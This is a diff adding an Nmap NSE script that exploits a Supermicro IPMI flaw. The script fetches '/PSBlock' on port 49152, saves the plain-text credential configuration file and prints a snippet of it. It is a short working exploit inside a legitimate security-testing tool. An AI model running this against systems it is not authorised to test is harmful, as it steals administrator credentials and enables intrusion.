summaryrefslogtreecommitdiffstats
path: root/scripts/supermicro-ipmi-conf.nse
diff options
context:
space:
mode:
Diffstat (limited to 'scripts/supermicro-ipmi-conf.nse')
-rw-r--r--scripts/supermicro-ipmi-conf.nse99
1 files changed, 99 insertions, 0 deletions
diff --git a/scripts/supermicro-ipmi-conf.nse b/scripts/supermicro-ipmi-conf.nse
new file mode 100644
index 0000000..77e1b29
--- /dev/null
+++ b/scripts/supermicro-ipmi-conf.nse
@@ -0,0 +1,99 @@
+description = [[
+Attempts to download an unprotected configuration file containing plain-text
+user credentials in vulnerable Supermicro Onboard IPMI controllers.
+
+The script connects to port 49152 and issues a request for "/PSBlock" to
+download the file. This configuration file contains users with their passwords
+in plain text.
+
+References:
+* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
+* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
+]]
+
+---
+-- @usage nmap -p49152 --script supermicro-ipmi-conf <target>
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 49152/tcp open unknown syn-ack
+-- | supermicro-ipmi-conf:
+-- | VULNERABLE:
+-- | Supermicro IPMI/BMC configuration file disclosure
+-- | State: VULNERABLE (Exploitable)
+-- | Description:
+-- | Some Supermicro IPMI/BMC controllers allow attackers to download
+-- | a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
+-- | network's Active Directory.
+-- | Disclosure date: 2014-06-19
+-- | Extra information:
+-- | Snippet from configuration file:
+-- | .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
+-- | Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
+-- |
+-- | References:
+-- |_ http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
+--
+-- @args supermicro-ipmi-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
+---
+
+author = "Paulino Calderon <calderon () websec mx>"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln"}
+
+local http = require "http"
+local io = require "io"
+local shortport = require "shortport"
+local string = require "string"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+
+portrule = shortport.portnumber(49152, "tcp")
+
+---
+--Writes string to file
+local function write_file(filename, contents)
+ local f, err = io.open(filename, "w")
+ if not f then
+ return f, err
+ end
+ f:write(contents)
+ f:close()
+ return true
+end
+
+action = function(host, port)
+ local fw = stdnse.get_script_args(SCRIPT_NAME..".out") or host.ip.."_bmc.conf"
+ local vuln = {
+ title = 'Supermicro IPMI/BMC configuration file disclosure',
+ state = vulns.STATE.NOT_VULN,
+ description = [[
+Some Supermicro IPMI/BMC controllers allow attackers to download
+ a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
+network's Active Directory.]],
+ references = {
+ 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/',
+ },
+ dates = {
+ disclosure = {year = '2014', month = '06', day = '19'},
+ },
+ }
+
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local open_session = http.get(host, port, "/PSBlock")
+ if open_session and open_session.status ==200 and string.len(open_session.body)>200 then
+ local s = open_session.body:gsub("%z", ".")
+ vuln.state = vulns.STATE.EXPLOIT
+ local status, err = write_file(fw,s)
+ local extra_info
+ if status then
+ extra_info = string.format("\nConfiguration file saved to '%s'\n", fw)
+ else
+ extra_info = ''
+ stdnse.debug(1, "Error saving configuration file to '%s': %s\n", fw, err)
+ end
+
+ vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)..extra_info
+ end
+ return vuln_report:make_output(vuln)
+end